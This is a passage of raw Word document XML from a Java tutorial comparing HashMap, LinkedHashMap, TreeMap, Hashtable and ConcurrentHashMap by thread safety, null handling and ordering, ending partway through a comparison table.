        <w:t>several variants</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of Map implementations that behave similarly with some additional or modified behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0F602A" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2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Let’s go through the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>types of HashMap and its variations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E92E03" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="001D7F2E">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8007B92">
          <v:rect id="_x0000_i1524" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6996DB37" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2E">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1. HashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBE785E" w14:textId="77777777" w:rsidR="000D2F04" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>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ault implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6698A253" w14:textId="77777777" w:rsidR="000D2F04" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>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t thread-safe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FFB5AB" w14:textId="77777777" w:rsidR="000D2F04" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>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llows </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1 null key</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multiple null values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FE8FDE" w14:textId="14E8EE03" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>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ordering guaranteed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE049E4" w14:textId="2154FD37" w:rsidR="000D2F04" w:rsidRPr="00CE4B95" w:rsidRDefault="000D2F0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5169777"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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p>
    <w:p w14:paraId="40C9264A" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="001D7F2E">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591841A">
          <v:rect id="_x0000_i1525" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCEAA43" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2E">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2. LinkedHashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3666D430" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>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Extends </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E6F50E" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>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intains insertion order or access order (if enabled)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3453D5BB" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>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lightly slower than </w:t>
      </w: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due to ordering overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB962DA" w14:textId="5B3EA706" w:rsidR="003C0520" w:rsidRPr="00CE4B95" w:rsidRDefault="003C05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0760029"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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nkedHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEFC48E" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2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ful when you want predictable iteration order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75545FFD" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="001D7F2E">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A85C125">
          <v:rect id="_x0000_i1526" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F35609" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2E">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3. TreeMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78815CA2" w14:textId="77777777" w:rsidR="001A3748" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>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mplements </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NavigableMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52722400" w14:textId="77777777" w:rsidR="001A3748" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>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orted</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by keys (natural order or comparator)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0989F09C" w14:textId="7792B68D" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>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null keys</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (throws NullPointerException), but allows null values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638CC2E4" w14:textId="756E7045" w:rsidR="001A3748" w:rsidRPr="00CE4B95" w:rsidRDefault="001A37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006854"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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reeMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4CC7A0" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2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ternally uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Red-Black Tree</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18930EDB" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="001D7F2E">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4F9145">
          <v:rect id="_x0000_i1527" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CADB735" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2E">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4. Hashtable (Legacy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B089ED9" w14:textId="77777777" w:rsidR="00A53D79" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>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lder synchronized version of HashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296803B0" w14:textId="77777777" w:rsidR="00A53D79" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>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safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, but </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>slower</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53311704" w14:textId="4B698033" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>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null key or null values</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allowed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4982C930" w14:textId="36C41E61" w:rsidR="00A53D79" w:rsidRPr="00CE4B95" w:rsidRDefault="00A53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5542512"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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table</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8BA73B" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2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arely used in modern Java (replaced by ConcurrentHashMap).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE7B2D4" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2E">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5. ConcurrentHashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE1BABA" w14:textId="77777777" w:rsidR="003A7EE8" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>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Designed for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>concurrent access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in multithreaded environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8A2752" w14:textId="77777777" w:rsidR="003A7EE8" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>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safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, high performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B48C49" w14:textId="77777777" w:rsidR="003A7EE8" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>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oes not allow null keys or values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB1243A" w14:textId="5AC0F645" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>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s </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>segment locking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in older versions; Java 8+ uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CAS and synchronized blocks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C1D0C6" w14:textId="292C4BA8" w:rsidR="003A7EE8" w:rsidRPr="00CE4B95" w:rsidRDefault="003A7E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1742609"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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oncurrentHashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22586B21" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="001D7F2E">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22BB989">
          <v:rect id="_x0000_i1528" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3512A18A" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2E">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mparison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7"/>
        <w:gridCol w:w="933"/>
        <w:gridCol w:w="1532"/>
        <w:gridCol w:w="1123"/>
        <w:gridCol w:w="981"/>
        <w:gridCol w:w="2321"/>
      </w:tblGrid>
      <w:tr w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w14:paraId="7997DA54" w14:textId="77777777" w:rsidTr="001D7F2E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26CBE8BA" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="003A7EE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77ABE6E2" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="003A7EE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ashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18C5589A" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="003A7EE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LinkedHashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65E4C005" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="003A7EE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reeMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13A762E0" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="003A7EE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ashtable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1788E3CC" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="003A7EE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urrentHashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w14:paraId="2DE2FD92" w14:textId="77777777" w:rsidTr="001D7F2E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="519FC4D2" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2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read-safe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="794E9350" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2E">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56765AE6" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2E">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158A06B2" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2E">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6B2F85AC" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2E">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1927FB5E" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2E">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r>
      <w:tr w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w14:paraId="7C3FC607" w14:textId="77777777" w:rsidTr="001D7F2E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78269B42" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2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ull key allowed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C1F2F47" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2E">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1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5365C42F" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2E">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1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02240FA0" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2E">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3C782AB7" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2E">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690B9429" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2E">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r>
      <w:tr w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w14:paraId="1807D327" w14:textId="77777777" w:rsidTr="001D7F2E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="359CF248" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2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rdering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="610771D2" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2E">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75A671EF" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2E">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insertion)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D6DC634" w14:textId="77777777" w:rsidR="001D7F2E" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7F2E" w:rsidP="001D7F2E">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sorted)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
